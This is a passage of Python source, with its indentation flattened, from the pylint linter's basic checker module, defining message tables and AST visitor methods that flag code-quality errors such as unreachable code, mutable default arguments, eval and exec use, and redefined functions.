nice_stats[node_type]["percent_documented"] = "NC"
try:
percent = (stats["badname_" + node_type] * 100.0) / total
nice_stats[node_type]["percent_badname"] = "%.2f" % percent
except KeyError:
nice_stats[node_type]["percent_badname"] = "NC"
lines = ("type", "number", "old number", "difference", "%documented", "%badname")
for node_type in ("module", "class", "method", "function"):
new = stats[node_type]
old = old_stats.get(node_type, None)
if old is not None:
diff_str = lint_utils.diff_string(old, new)
else:
old, diff_str = "NC", "NC"
lines += (
node_type,
str(new),
str(old),
diff_str,
nice_stats[node_type].get("percent_documented", "0"),
nice_stats[node_type].get("percent_badname", "0"),
)
sect.append(reporter_nodes.Table(children=lines, cols=6, rheaders=1))
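# For illustration, the `stats` mapping consumed above is expected to hold, per
# node type, entries along the lines of
#     {"class": 2, "undocumented_class": 1, "badname_class": 0, ...}
# and a missing per-type total raises EmptyReportError.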
def redefined_by_decorator(node):
"""return True if the object is a method redefined via decorator.
For example:
@property
def x(self): return self._x
@x.setter
def x(self, value): self._x = value
"""
if node.decorators:
for decorator in node.decorators.nodes:
if (
isinstance(decorator, astroid.Attribute)
and getattr(decorator.expr, "name", None) == node.name
):
return True
return False
class _BasicChecker(checkers.BaseChecker):
__implements__ = interfaces.IAstroidChecker
name = "basic"
class BasicErrorChecker(_BasicChecker):
msgs = {
"E0100": (
"__init__ method is a generator",
"init-is-generator",
"Used when the special class method __init__ is turned into a "
"generator by a yield in its body.",
),
"E0101": (
"Explicit return in __init__",
"return-in-init",
"Used when the special class method __init__ has an explicit "
"return value.",
),
"E0102": (
"%s already defined line %s",
"function-redefined",
"Used when a function / class / method is redefined.",
),
"E0103": (
"%r not properly in loop",
"not-in-loop",
"Used when break or continue keywords are used outside a loop.",
),
"E0104": (
"Return outside function",
"return-outside-function",
'Used when a "return" statement is found outside a function or method.',
),
"E0105": (
"Yield outside function",
"yield-outside-function",
'Used when a "yield" statement is found outside a function or method.',
),
"E0106": (
"Return with argument inside generator",
"return-arg-in-generator",
'Used when a "return" statement with an argument is found '
"outside in a generator function or method (e.g. with some "
'"yield" statements).',
{"maxversion": (3, 3)},
),
"E0107": (
"Use of the non-existent %s operator",
"nonexistent-operator",
"Used when you attempt to use the C-style pre-increment or "
"pre-decrement operator -- and ++, which doesn't exist in Python.",
),
"E0108": (
"Duplicate argument name %s in function definition",
"duplicate-argument-name",
"Duplicate argument names in function definitions are syntax errors.",
),
"E0110": (
"Abstract class %r with abstract methods instantiated",
"abstract-class-instantiated",
"Used when an abstract class with `abc.ABCMeta` as metaclass "
"has abstract methods and is instantiated.",
),
"W0120": (
"Else clause on loop without a break statement",
"useless-else-on-loop",
"Loops should only have an else clause if they can exit early "
"with a break statement, otherwise the statements under else "
"should be on the same scope as the loop itself.",
),
"E0112": (
"More than one starred expression in assignment",
"too-many-star-expressions",
"Emitted when there are more than one starred "
"expressions (`*x`) in an assignment. This is a SyntaxError.",
),
"E0113": (
"Starred assignment target must be in a list or tuple",
"invalid-star-assignment-target",
"Emitted when a star expression is used as a starred assignment target.",
),
"E0114": (
"Can use starred expression only in assignment target",
"star-needs-assignment-target",
"Emitted when a star expression is not used in an assignment target.",
),
"E0115": (
"Name %r is nonlocal and global",
"nonlocal-and-global",
"Emitted when a name is both nonlocal and global.",
),
"E0116": (
"'continue' not supported inside 'finally' clause",
"continue-in-finally",
"Emitted when the `continue` keyword is found "
"inside a finally clause, which is a SyntaxError.",
{"maxversion": (3, 8)},
),
"E0117": (
"nonlocal name %s found without binding",
"nonlocal-without-binding",
"Emitted when a nonlocal variable does not have an attached "
"name somewhere in the parent scopes",
),
"E0118": (
"Name %r is used prior to global declaration",
"used-prior-global-declaration",
"Emitted when a name is used prior a global declaration, "
"which results in an error since Python 3.6.",
{"minversion": (3, 6)},
),
}
@utils.check_messages("function-redefined")
def visit_classdef(self, node):
self._check_redefinition("class", node)
def _too_many_starred_for_tuple(self, assign_tuple):
starred_count = 0
for elem in assign_tuple.itered():
if isinstance(elem, astroid.Tuple):
return self._too_many_starred_for_tuple(elem)
if isinstance(elem, astroid.Starred):
starred_count += 1
return starred_count > 1
@utils.check_messages("too-many-star-expressions", "invalid-star-assignment-target")
def visit_assign(self, node):
# Check *a, *b = ...
assign_target = node.targets[0]
# Check *a = b
if isinstance(node.targets[0], astroid.Starred):
self.add_message("invalid-star-assignment-target", node=node)
if not isinstance(assign_target, astroid.Tuple):
return
if self._too_many_starred_for_tuple(assign_target):
self.add_message("too-many-star-expressions", node=node)
@utils.check_messages("star-needs-assignment-target")
def visit_starred(self, node):
"""Check that a Starred expression is used in an assignment target."""
if isinstance(node.parent, astroid.Call):
# f(*args) is converted to Call(args=[Starred]), so ignore
# them for this check.
return
if isinstance(
node.parent, (astroid.List, astroid.Tuple, astroid.Set, astroid.Dict)
):
# PEP 448 unpacking.
return
stmt = node.statement()
if not isinstance(stmt, astroid.Assign):
return
if stmt.value is node or stmt.value.parent_of(node):
self.add_message("star-needs-assignment-target", node=node)
@utils.check_messages(
"init-is-generator",
"return-in-init",
"function-redefined",
"return-arg-in-generator",
"duplicate-argument-name",
"nonlocal-and-global",
"used-prior-global-declaration",
)
def visit_functiondef(self, node):
self._check_nonlocal_and_global(node)
self._check_name_used_prior_global(node)
if not redefined_by_decorator(
node
) and not utils.is_registered_in_singledispatch_function(node):
self._check_redefinition(node.is_method() and "method" or "function", node)
# checks for max returns, branch, return in __init__
returns = node.nodes_of_class(
astroid.Return, skip_klass=(astroid.FunctionDef, astroid.ClassDef)
)
if node.is_method() and node.name == "__init__":
if node.is_generator():
self.add_message("init-is-generator", node=node)
else:
values = [r.value for r in returns]
# Are we returning anything but None from constructors
if any(v for v in values if not utils.is_none(v)):
self.add_message("return-in-init", node=node)
# Check for duplicate names by clustering args with same name for detailed report
arg_clusters = collections.defaultdict(list)
arguments = filter(None, [node.args.args, node.args.kwonlyargs])
for arg in itertools.chain.from_iterable(arguments):
arg_clusters[arg.name].append(arg)
# provide detailed report about each repeated argument
for argument_duplicates in arg_clusters.values():
if len(argument_duplicates) != 1:
for argument in argument_duplicates:
self.add_message(
"duplicate-argument-name",
line=argument.lineno,
node=argument,
args=(argument.name,),
)
visit_asyncfunctiondef = visit_functiondef
def _check_name_used_prior_global(self, node):
scope_globals = {
name: child
for child in node.nodes_of_class(astroid.Global)
for name in child.names
if child.scope() is node
}
if not scope_globals:
return
for node_name in node.nodes_of_class(astroid.Name):
if node_name.scope() is not node:
continue
name = node_name.name
corresponding_global = scope_globals.get(name)
if not corresponding_global:
continue
global_lineno = corresponding_global.fromlineno
if global_lineno and global_lineno > node_name.fromlineno:
self.add_message(
"used-prior-global-declaration", node=node_name, args=(name,)
)
def _check_nonlocal_and_global(self, node):
"""Check that a name is both nonlocal and global."""
def same_scope(current):
return current.scope() is node
from_iter = itertools.chain.from_iterable
nonlocals = set(
from_iter(
child.names
for child in node.nodes_of_class(astroid.Nonlocal)
if same_scope(child)
)
)
if not nonlocals:
return
global_vars = set(
from_iter(
child.names
for child in node.nodes_of_class(astroid.Global)
if same_scope(child)
)
)
for name in nonlocals.intersection(global_vars):
self.add_message("nonlocal-and-global", args=(name,), node=node)
@utils.check_messages("return-outside-function")
def visit_return(self, node):
if not isinstance(node.frame(), astroid.FunctionDef):
self.add_message("return-outside-function", node=node)
@utils.check_messages("yield-outside-function")
def visit_yield(self, node):
self._check_yield_outside_func(node)
@utils.check_messages("yield-outside-function")
def visit_yieldfrom(self, node):
self._check_yield_outside_func(node)
@utils.check_messages("not-in-loop", "continue-in-finally")
def visit_continue(self, node):
self._check_in_loop(node, "continue")
@utils.check_messages("not-in-loop")
def visit_break(self, node):
self._check_in_loop(node, "break")
@utils.check_messages("useless-else-on-loop")
def visit_for(self, node):
self._check_else_on_loop(node)
@utils.check_messages("useless-else-on-loop")
def visit_while(self, node):
self._check_else_on_loop(node)
@utils.check_messages("nonexistent-operator")
def visit_unaryop(self, node):
"""check use of the non-existent ++ and -- operator operator"""
if (
(node.op in "+-")
and isinstance(node.operand, astroid.UnaryOp)
and (node.operand.op == node.op)
):
self.add_message("nonexistent-operator", node=node, args=node.op * 2)
def _check_nonlocal_without_binding(self, node, name):
current_scope = node.scope()
while True:
if current_scope.parent is None:
break
if not isinstance(current_scope, (astroid.ClassDef, astroid.FunctionDef)):
self.add_message("nonlocal-without-binding", args=(name,), node=node)
return
if name not in current_scope.locals:
current_scope = current_scope.parent.scope()
continue
# Okay, found it.
return
if not isinstance(current_scope, astroid.FunctionDef):
self.add_message("nonlocal-without-binding", args=(name,), node=node)
@utils.check_messages("nonlocal-without-binding")
def visit_nonlocal(self, node):
for name in node.names:
self._check_nonlocal_without_binding(node, name)
@utils.check_messages("abstract-class-instantiated")
def visit_call(self, node):
"""Check instantiating abstract class with
abc.ABCMeta as metaclass.
"""
try:
for inferred in node.func.infer():
self._check_inferred_class_is_abstract(inferred, node)
except astroid.InferenceError:
return
def _check_inferred_class_is_abstract(self, inferred, node):
if not isinstance(inferred, astroid.ClassDef):
return
klass = utils.node_frame_class(node)
if klass is inferred:
# Don't emit the warning if the class is instantiated
# in its own body or if the call is not an instance
# creation. If the class is instantiated into its own
# body, we're expecting that it knows what it is doing.
return
# __init__ was called
abstract_methods = _has_abstract_methods(inferred)
if not abstract_methods:
return
metaclass = inferred.metaclass()
if metaclass is None:
# Python 3.4 has `abc.ABC`, which won't be detected
# by ClassNode.metaclass()
for ancestor in inferred.ancestors():
if ancestor.qname() == "abc.ABC":
self.add_message(
"abstract-class-instantiated", args=(inferred.name,), node=node
)
break
return
if metaclass.qname() in ABC_METACLASSES:
self.add_message(
"abstract-class-instantiated", args=(inferred.name,), node=node
)
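    # Hedged illustration of what the check above flags (class names made up):
    #
    #     import abc
    #
    #     class Base(abc.ABC):
    #         @abc.abstractmethod
    #         def run(self): ...
    #
    #     Base()   # abstract-class-instantiated: "run" is still abstract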
def _check_yield_outside_func(self, node):
if not isinstance(node.frame(), (astroid.FunctionDef, astroid.Lambda)):
self.add_message("yield-outside-function", node=node)
def _check_else_on_loop(self, node):
"""Check that any loop with an else clause has a break statement."""
if node.orelse and not _loop_exits_early(node):
self.add_message(
"useless-else-on-loop",
node=node,
# This is not optimal, but the line previous
# to the first statement in the else clause
# will usually be the one that contains the else:.
line=node.orelse[0].lineno - 1,
)
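    # Hedged illustration (helper names made up): the else clause below is
    # useless because the loop contains no break, so the else body always runs.
    #
    #     for item in items:
    #         process(item)
    #     else:
    #         cleanup()        # useless-else-on-loop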
def _check_in_loop(self, node, node_name):
"""check that a node is inside a for or while loop"""
_node = node.parent
while _node:
if isinstance(_node, (astroid.For, astroid.While)):
if node not in _node.orelse:
return
if isinstance(_node, (astroid.ClassDef, astroid.FunctionDef)):
break
if (
isinstance(_node, astroid.TryFinally)
and node in _node.finalbody
and isinstance(node, astroid.Continue)
):
self.add_message("continue-in-finally", node=node)
_node = _node.parent
self.add_message("not-in-loop", node=node, args=node_name)
def _check_redefinition(self, redeftype, node):
"""check for redefinition of a function / method / class name"""
parent_frame = node.parent.frame()
# Ignore function stubs created for type information
redefinitions = parent_frame.locals[node.name]
defined_self = next(
(local for local in redefinitions if not utils.is_overload_stub(local)),
node,
)
if defined_self is not node and not astroid.are_exclusive(node, defined_self):
# Additional checks for methods which are not considered
# redefined, since they are already part of the base API.
if (
isinstance(parent_frame, astroid.ClassDef)
and node.name in REDEFINABLE_METHODS
):
return
# Skip typing.overload() functions.
if utils.is_overload_stub(node):
return
# Exempt functions redefined on a condition.
if isinstance(node.parent, astroid.If):
# Exempt "if not <func>" cases
if (
isinstance(node.parent.test, astroid.UnaryOp)
and node.parent.test.op == "not"
and isinstance(node.parent.test.operand, astroid.Name)
and node.parent.test.operand.name == node.name
):
return
# Exempt "if <func> is not None" cases
# pylint: disable=too-many-boolean-expressions
if (
isinstance(node.parent.test, astroid.Compare)
and isinstance(node.parent.test.left, astroid.Name)
and node.parent.test.left.name == node.name
and node.parent.test.ops[0][0] == "is"
and isinstance(node.parent.test.ops[0][1], astroid.Const)
and node.parent.test.ops[0][1].value is None
):
return
# Check if we have forward references for this node.
try:
redefinition_index = redefinitions.index(node)
except ValueError:
pass
else:
for redefinition in redefinitions[:redefinition_index]:
inferred = utils.safe_infer(redefinition)
if (
inferred
and isinstance(inferred, astroid.Instance)
and inferred.qname() == TYPING_FORWARD_REF_QNAME
):
return
dummy_variables_rgx = lint_utils.get_global_option(
self, "dummy-variables-rgx", default=None
)
if dummy_variables_rgx and dummy_variables_rgx.match(node.name):
return
self.add_message(
"function-redefined",
node=node,
args=(redeftype, defined_self.fromlineno),
)
class BasicChecker(_BasicChecker):
"""checks for :
* doc strings
* number of arguments, local variables, branches, returns and statements in
functions, methods
* required module attributes
* dangerous default values as arguments
* redefinition of function / method / class
* uses of the global statement
"""
__implements__ = interfaces.IAstroidChecker
name = "basic"
msgs = {
"W0101": (
"Unreachable code",
"unreachable",
'Used when there is some code behind a "return" or "raise" '
"statement, which will never be accessed.",
),
"W0102": (
"Dangerous default value %s as argument",
"dangerous-default-value",
"Used when a mutable value as list or dictionary is detected in "
"a default value for an argument.",
),
"W0104": (
"Statement seems to have no effect",
"pointless-statement",
"Used when a statement doesn't have (or at least seems to) any effect.",
),
"W0105": (
"String statement has no effect",
"pointless-string-statement",
"Used when a string is used as a statement (which of course "
"has no effect). This is a particular case of W0104 with its "
"own message so you can easily disable it if you're using "
"those strings as documentation, instead of comments.",
),
"W0106": (
'Expression "%s" is assigned to nothing',
"expression-not-assigned",
"Used when an expression that is not a function call is assigned "
"to nothing. Probably something else was intended.",
),
"W0108": (
"Lambda may not be necessary",
"unnecessary-lambda",
"Used when the body of a lambda expression is a function call "
"on the same argument list as the lambda itself; such lambda "
"expressions are in all but a few cases replaceable with the "
"function being called in the body of the lambda.",
),
"W0109": (
"Duplicate key %r in dictionary",
"duplicate-key",
"Used when a dictionary expression binds the same key multiple times.",
),
"W0122": (
"Use of exec",
"exec-used",
'Used when you use the "exec" statement (function for Python '
"3), to discourage its usage. That doesn't "
"mean you cannot use it !",
),
"W0123": (
"Use of eval",
"eval-used",
'Used when you use the "eval" function, to discourage its '
"usage. Consider using `ast.literal_eval` for safely evaluating "
"strings containing Python expressions "
"from untrusted sources. ",
),
"W0150": (
"%s statement in finally block may swallow exception",
"lost-exception",
"Used when a break or a return statement is found inside the "
"finally clause of a try...finally block: the exceptions raised "
"in the try clause will be silently swallowed instead of being "
"re-raised.",
),
"W0199": (
"Assert called on a 2-item-tuple. Did you mean 'assert x,y'?",
"assert-on-tuple",
"A call of assert on a tuple will always evaluate to true if "
"the tuple is not empty, and will always evaluate to false if "
"it is.",
),
"W0124": (
'Following "as" with another context manager looks like a tuple.',
"confusing-with-statement",
"Emitted when a `with` statement component returns multiple values "
"and uses name binding with `as` only for a part of those values, "
"as in with ctx() as a, b. This can be misleading, since it's not "
"clear if the context manager returns a tuple or if the node without "
"a name binding is another context manager.",
),
"W0125": (
"Using a conditional statement with a constant value",
"using-constant-test",
"Emitted when a conditional statement (If or ternary if) "
"uses a constant value for its test. This might not be what "
"the user intended to do.",
),
"W0126": (
"Using a conditional statement with potentially wrong function or method call due to missing parentheses",
"missing-parentheses-for-call-in-test",
"Emitted when a conditional statement (If or ternary if) "
"seems to wrongly call a function due to missing parentheses",
),
"W0127": (
"Assigning the same variable %r to itself",
"self-assigning-variable",
"Emitted when we detect that a variable is assigned to itself",
),
"W0128": (
"Redeclared variable %r in assignment",
"redeclared-assigned-name",
"Emitted when we detect that a variable was redeclared in the same assignment.",
),
"E0111": (
"The first reversed() argument is not a sequence",
"bad-reversed-sequence",
"Used when the first argument to reversed() builtin "
"isn't a sequence (does not implement __reversed__, "
"nor __getitem__ and __len__",
),
"E0119": (
"format function is not called on str",
"misplaced-format-function",
"Emitted when format function is not called on str object. "
'e.g doing print("value: {}").format(123) instead of '
'print("value: {}".format(123)). This might not be what the user '
"intended to do.",
),
"W0129": (
"Assert statement has a string literal as its first argument. The assert will %s fail.",
"assert-on-string-literal",
"Used when an assert statement has a string literal as its first argument, which will "
"cause the assert to always pass.",
),
}
reports = (("RP0101", "Statistics by type", report_by_type_stats),)
def __init__(self, linter):
_BasicChecker.__init__(self, linter)
self.stats = None
self._tryfinallys = None
def open(self):
"""initialize visit variables and statistics"""
self._tryfinallys = []
self.stats = self.linter.add_stats(module=0, function=0, method=0, class_=0)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_if(self, node):
self._check_using_constant_test(node, node.test)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_ifexp(self, node):
self._check_using_constant_test(node, node.test)
@utils.check_messages("using-constant-test", "missing-parentheses-for-call-in-test")
def visit_comprehension(self, node):
if node.ifs:
for if_test in node.ifs:
self._check_using_constant_test(node, if_test)
def _check_using_constant_test(self, node, test):
const_nodes = (
astroid.Module,
astroid.scoped_nodes.GeneratorExp,
astroid.Lambda,
astroid.FunctionDef,
astroid.ClassDef,
astroid.bases.Generator,
astroid.UnboundMethod,
astroid.BoundMethod,
astroid.Module,
)
structs = (astroid.Dict, astroid.Tuple, astroid.Set)
# These nodes are excepted, since they are not constant
# values, requiring a computation to happen.
except_nodes = (
astroid.Call,
astroid.BinOp,
astroid.BoolOp,
astroid.UnaryOp,
astroid.Subscript,
)
inferred = None
emit = isinstance(test, (astroid.Const,) + structs + const_nodes)
if not isinstance(test, except_nodes):
inferred = utils.safe_infer(test)
if emit:
self.add_message("using-constant-test", node=node)
elif isinstance(inferred, const_nodes):
            # If the constant node is a FunctionDef or Lambda then
            # it may be an illicit function call due to missing parentheses
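            # Illustrative example (hypothetical code) of what this branch
            # catches:
            #     def ready(): return True
            #     if ready:        # missing-parentheses-for-call-in-test
            #         ...
            # whereas ``if ready():`` calls the function as intended.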
call_inferred = None
try:
if isinstance(inferred, astroid.FunctionDef):
call_inferred = inferred.infer_call_result()
elif isinstance(inferred, astroid.Lambda):
call_inferred = inferred.infer_call_result(node)
except astroid.InferenceError:
call_inferred = None
if call_inferred:
try:
for inf_call in call_inferred:
if inf_call != astroid.Uninferable:
self.add_message(
"missing-parentheses-for-call-in-test", node=node
)
break
except astroid.InferenceError:
pass
self.add_message("using-constant-test", node=node)
def visit_module(self, _):
"""check module name, docstring and required arguments"""
self.stats["module"] += 1
def visit_classdef(self, node): # pylint: disable=unused-argument
"""check module name, docstring and redefinition
increment branch counter
"""
self.stats["class"] += 1
@utils.check_messages(
"pointless-statement", "pointless-string-statement", "expression-not-assigned"
)
def visit_expr(self, node):
"""Check for various kind of statements without effect"""
expr = node.value
if isinstance(expr, astroid.Const) and isinstance(expr.value, str):
# treat string statement in a separated message
# Handle PEP-257 attribute docstrings.
# An attribute docstring is defined as being a string right after
# an assignment at the module level, class level or __init__ level.
scope = expr.scope()
if isinstance(
scope, (astroid.ClassDef, astroid.Module, astroid.FunctionDef)
):
if isinstance(scope, astroid.FunctionDef) and scope.name != "__init__":
pass
else:
sibling = expr.previous_sibling()
if (
sibling is not None
and sibling.scope() is scope
and isinstance(sibling, (astroid.Assign, astroid.AnnAssign))
):
return
self.add_message("pointless-string-statement", node=node)
return
# Ignore if this is :
# * a direct function call
# * the unique child of a try/except body
# * a yield statement
# * an ellipsis (which can be used on Python 3 instead of pass)
# warn W0106 if we have any underlying function call (we can't predict
# side effects), else pointless-statement
if (
isinstance(
expr, (astroid.Yield, astroid.Await, astroid.Ellipsis, astroid.Call)
)
or (
isinstance(node.parent, astroid.TryExcept)
and node.parent.body == [node]
)
or (isinstance(expr, astroid.Const) and expr.value is Ellipsis)
):
return
if any(expr.nodes_of_class(astroid.Call)):
self.add_message(
"expression-not-assigned", node=node, args=expr.as_string()
)
else:
self.add_message("pointless-statement", node=node)
@staticmethod
def _filter_vararg(node, call_args):
# Return the arguments for the given call which are
# not passed as vararg.
for arg in call_args:
if isinstance(arg, astroid.Starred):
if (
isinstance(arg.value, astroid.Name)
and arg.value.name != node.args.vararg
):
yield arg
else:
yield arg
@staticmethod
def _has_variadic_argument(args, variadic_name):
if not args:
return True
for arg in args:
if isinstance(arg.value, astroid.Name):
if arg.value.name != variadic_name:
return True
else:
return True
return False
@utils.check_messages("unnecessary-lambda")
def visit_lambda(self, node):
"""check whether or not the lambda is suspicious"""
# if the body of the lambda is a call expression with the same
# argument list as the lambda itself, then the lambda is
# possibly unnecessary and at least suspicious.
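        # Illustrative example (hypothetical code) of what gets reported:
        #     sorted(data, key=lambda x: len(x))    # unnecessary-lambda
        # which is replaceable with:
        #     sorted(data, key=len)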
if node.args.defaults:
# If the arguments of the lambda include defaults, then a
# judgment cannot be made because there is no way to check
# that the defaults defined by the lambda are the same as
# the defaults defined by the function called in the body
# of the lambda.
return
call = node.body
if not isinstance(call, astroid.Call):
# The body of the lambda must be a function call expression
# for the lambda to be unnecessary.
return
if isinstance(node.body.func, astroid.Attribute) and isinstance(
node.body.func.expr, astroid.Call
):
# Chained call, the intermediate call might
# return something else (but we don't check that, yet).
return
call_site = astroid.arguments.CallSite.from_call(call)
ordinary_args = list(node.args.args)
new_call_args = list(self._filter_vararg(node, call.args))
if node.args.kwarg:
if self._has_variadic_argument(call.kwargs, node.args.kwarg):
return
if node.args.vararg:
if self._has_variadic_argument(call.starargs, node.args.vararg):
return
elif call.starargs:
return
if call.keywords:
# Look for additional keyword arguments that are not part
# of the lambda's signature
lambda_kwargs = {keyword.name for keyword in node.args.defaults}
if len(lambda_kwargs) != len(call_site.keyword_arguments):
# Different lengths, so probably not identical
return
if set(call_site.keyword_arguments).difference(lambda_kwargs):
return
# The "ordinary" arguments must be in a correspondence such that:
# ordinary_args[i].name == call.args[i].name.
if len(ordinary_args) != len(new_call_args):
return
for arg, passed_arg in zip(ordinary_args, new_call_args):
if not isinstance(passed_arg, astroid.Name):
return
if arg.name != passed_arg.name:
return
self.add_message("unnecessary-lambda", line=node.fromlineno, node=node)
@utils.check_messages("dangerous-default-value")
def visit_functiondef(self, node):
"""check function name, docstring, arguments, redefinition,
variable names, max locals
"""
self.stats["method" if node.is_method() else "function"] += 1
self._check_dangerous_default(node)
visit_asyncfunctiondef = visit_functiondef
def _check_dangerous_default(self, node):
"""Check for dangerous default values as arguments."""
def is_iterable(internal_node):
return isinstance(internal_node, (astroid.List, astroid.Set, astroid.Dict))
        defaults = (node.args.defaults or []) + (node.args.kw_defaults or [])
for default in defaults:
if not default:
continue
try:
value = next(default.infer())
except astroid.InferenceError:
continue
if (
isinstance(value, astroid.Instance)
and value.qname() in DEFAULT_ARGUMENT_SYMBOLS
):
if value is default:
msg = DEFAULT_ARGUMENT_SYMBOLS[value.qname()]
elif isinstance(value, astroid.Instance) or is_iterable(value):
# We are here in the following situation(s):
# * a dict/set/list/tuple call which wasn't inferred
# to a syntax node ({}, () etc.). This can happen
# when the arguments are invalid or unknown to
# the inference.
# * a variable from somewhere else, which turns out to be a list
# or a dict.
if is_iterable(default):
msg = value.pytype()
elif isinstance(default, astroid.Call):
msg = f"{value.name}() ({value.qname()})"
else:
msg = f"{default.as_string()} ({value.qname()})"
else:
# this argument is a name
msg = f"{default.as_string()} ({DEFAULT_ARGUMENT_SYMBOLS[value.qname()]})"
self.add_message("dangerous-default-value", node=node, args=(msg,))
@utils.check_messages("unreachable", "lost-exception")
def visit_return(self, node):
"""1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
"""
self._check_unreachable(node)
        # Is it inside the final body of a try...finally block?
self._check_not_in_finally(node, "return", (astroid.FunctionDef,))
@utils.check_messages("unreachable")
def visit_continue(self, node):
"""check is the node has a right sibling (if so, that's some unreachable
code)
"""
self._check_unreachable(node)
@utils.check_messages("unreachable", "lost-exception")
def visit_break(self, node):
"""1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
"""
        # 1 - Does it have a right sibling?
        self._check_unreachable(node)
        # 2 - Is it inside the final body of a try...finally block?
self._check_not_in_finally(node, "break", (astroid.For, astroid.While))
@utils.check_messages("unreachable")
def visit_raise(self, node):
"""check if the node has a right sibling (if so, that's some unreachable
code)
"""
self._check_unreachable(node)
@utils.check_messages("exec-used")
def visit_exec(self, node):
"""just print a warning on exec statements"""
self.add_message("exec-used", node=node)
def _check_misplaced_format_function(self, call_node):
if not isinstance(call_node.func, astroid.Attribute):
return
if call_node.func.attrname != "format":
return
expr = utils.safe_infer(call_node.func.expr)
if expr is astroid.Uninferable:
return
if not expr:
            # we are doubtful about the inferred type of the node, so just
            # check whether format was called on print()
call_expr = call_node.func.expr
if not isinstance(call_expr, astroid.Call):
return
if (
isinstance(call_expr.func, astroid.Name)
and call_expr.func.name == "print"
):
self.add_message("misplaced-format-function", node=call_node)
@utils.check_messages(
"eval-used", "exec-used", "bad-reversed-sequence", "misplaced-format-function"
)
def visit_call(self, node):
"""visit a Call node -> check if this is not a disallowed builtin
call and check for * or ** use
"""
self._check_misplaced_format_function(node)
if isinstance(node.func, astroid.Name):
name = node.func.name
# ignore the name if it's not a builtin (i.e. not defined in the
# locals nor globals scope)
if not (name in node.frame() or name in node.root()):
if name == "exec":
self.add_message("exec-used", node=node)
elif name == "reversed":
self._check_reversed(node)
elif name == "eval":
self.add_message("eval-used", node=node)
@utils.check_messages("assert-on-tuple", "assert-on-string-literal")
def visit_assert(self, node):
"""check whether assert is used on a tuple or string literal."""
if (
node.fail is None
and isinstance(node.test, astroid.Tuple)
and len(node.test.elts) == 2
):
self.add_message("assert-on-tuple", node=node)
if isinstance(node.test, astroid.Const) and isinstance(node.test.value, str):
if node.test.value:
when = "never"
else:
when = "always"
self.add_message("assert-on-string-literal", node=node, args=(when,))
@utils.check_messages("duplicate-key")
def visit_dict(self, node):
"""check duplicate key in dictionary"""
keys = set()
for k, _ in node.items:
if isinstance(k, astroid.Const):
key = k.value
if key in keys:
self.add_message("duplicate-key", node=node, args=key)
keys.add(key)
def visit_tryfinally(self, node):
"""update try...finally flag"""
self._tryfinallys.append(node)
def leave_tryfinally(self, node): # pylint: disable=unused-argument
"""update try...finally flag"""
self._tryfinallys.pop()
def _check_unreachable(self, node):
"""check unreachable code"""
unreach_stmt = node.next_sibling()
if unreach_stmt is not None:
self.add_message("unreachable", node=unreach_stmt)
def _check_not_in_finally(self, node, node_name, breaker_classes=()):
"""check that a node is not inside a finally clause of a
try...finally statement.
        If, before reaching the try...finally block, we find a parent whose
        type is in breaker_classes, we skip the whole check."""
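        # Illustrative example (hypothetical code) of what gets reported:
        #     try:
        #         risky()
        #     finally:
        #         return result    # lost-exception: swallows any exception raised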
        # if self._tryfinallys is empty, we're not in a try...finally block
if not self._tryfinallys:
return
        # the node could be a grand-grand-...-child of the try...finally
_parent = node.parent
_node = node
while _parent and not isinstance(_parent, breaker_classes):
if hasattr(_parent, "finalbody") and _node in _parent.finalbody:
self.add_message("lost-exception", node=node, args=node_name)
return
_node = _parent
_parent = _node.parent
def _check_reversed(self, node):
"""check that the argument to `reversed` is a sequence"""
try:
argument = utils.safe_infer(utils.get_argument_from_call(node, position=0))
except utils.NoSuchArgumentError:
pass
else:
if argument is astroid.Uninferable:
return
if argument is None:
# Nothing was inferred.
# Try to see if we have iter().
if isinstance(node.args[0], astroid.Call):
try:
func = next(node.args[0].func.infer())
except astroid.InferenceError:
return
if getattr(
func, "name", None
) == "iter" and utils.is_builtin_object(func):
self.add_message("bad-reversed-sequence", node=node)
return
if isinstance(argument, (astroid.List, astroid.Tuple)):
return
if isinstance(argument, astroid.Instance):
if any(
ancestor.name == "dict" and utils.is_builtin_object(ancestor)
for ancestor in itertools.chain(
(argument._proxied,), argument._proxied.ancestors()
)
):
# Mappings aren't accepted by reversed(), unless
# they provide explicitly a __reversed__ method.
try:
argument.locals[REVERSED_PROTOCOL_METHOD]
except KeyError:
self.add_message("bad-reversed-sequence", node=node)
return
if hasattr(argument, "getattr"):
# everything else is not a proper sequence for reversed()
for methods in REVERSED_METHODS:
for meth in methods:
try:
argument.getattr(meth)
except astroid.NotFoundError:
break
else:
break
else:
self.add_message("bad-reversed-sequence", node=node)
else:
self.add_message("bad-reversed-sequence", node=node)
@utils.check_messages("confusing-with-statement")
def visit_with(self, node):
# a "with" statement with multiple managers corresponds
# to one AST "With" node with multiple items
pairs = node.items
if pairs:
for prev_pair, pair in zip(pairs, pairs[1:]):
if isinstance(prev_pair[1], astroid.AssignName) and (
pair[1] is None and not isinstance(pair[0], astroid.Call)
):
# Don't emit a message if the second is a function call
# there's no way that can be mistaken for a name assignment.
# If the line number doesn't match
# we assume it's a nested "with".
self.add_message("confusing-with-statement", node=node)
def _check_self_assigning_variable(self, node):
# Detect assigning to the same variable.
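        # Illustrative examples (hypothetical code):
        #     count = count    # self-assigning-variable
        #     a, b = a, b      # self-assigning-variable (reported per name)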
scope = node.scope()
scope_locals = scope.locals
rhs_names = []
targets = node.targets
if isinstance(targets[0], astroid.Tuple):
if len(targets) != 1:
# A complex assignment, so bail out early.
return
targets = targets[0].elts
if len(targets) == 1:
# Unpacking a variable into the same name.
return
if isinstance(node.value, astroid.Name):
if len(targets) != 1:
return
rhs_names = [node.value]
elif isinstance(node.value, astroid.Tuple):
rhs_count = len(node.value.elts)
if len(targets) != rhs_count or rhs_count == 1:
return
rhs_names = node.value.elts
for target, lhs_name in zip(targets, rhs_names):
if not isinstance(lhs_name, astroid.Name):
continue
if not isinstance(target, astroid.AssignName):
continue
if isinstance(scope, astroid.ClassDef) and target.name in scope_locals:
# Check that the scope is different than a class level, which is usually
# a pattern to expose module level attributes as class level ones.
continue
if target.name == lhs_name.name:
self.add_message(
"self-assigning-variable", args=(target.name,), node=target
)
def _check_redeclared_assign_name(self, targets):
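        # Illustrative example (hypothetical code) of what gets reported:
        #     first, first = get_pair()    # redeclared-assigned-name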
